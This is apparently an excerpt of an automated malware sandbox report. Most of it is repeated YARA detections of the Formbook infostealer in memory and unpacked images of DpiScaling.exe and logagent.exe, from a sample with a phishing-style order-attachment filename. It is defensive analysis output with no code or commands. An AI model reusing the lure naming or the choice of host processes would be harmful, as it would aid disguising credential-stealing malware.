          Source: Yara matchFile source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.2.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.DpiScaling.exe.72480000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 20.2.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.DpiScaling.exe.72480000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.810820140.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.980408969.0000000002C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.826394913.0000000004B90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.772008503.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.714097353.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.979059154.0000000000800000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.749509351.000000000E9DF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.836253520.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.860879140.0000000000E90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.810315428.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.864516356.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.811363392.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.714755943.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.860188435.0000000000E60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.844946988.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.714442633.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.980367511.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000000.811926457.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.713760138.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.826540547.0000000004BF0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.830080872.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.835723366.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000016.00000002.863247728.0000000003280000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.836796283.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000000.837305764.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Nova narudzba u prilogu.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DpiScaling.exe.72480000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.DpiScaling.exe.72480000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
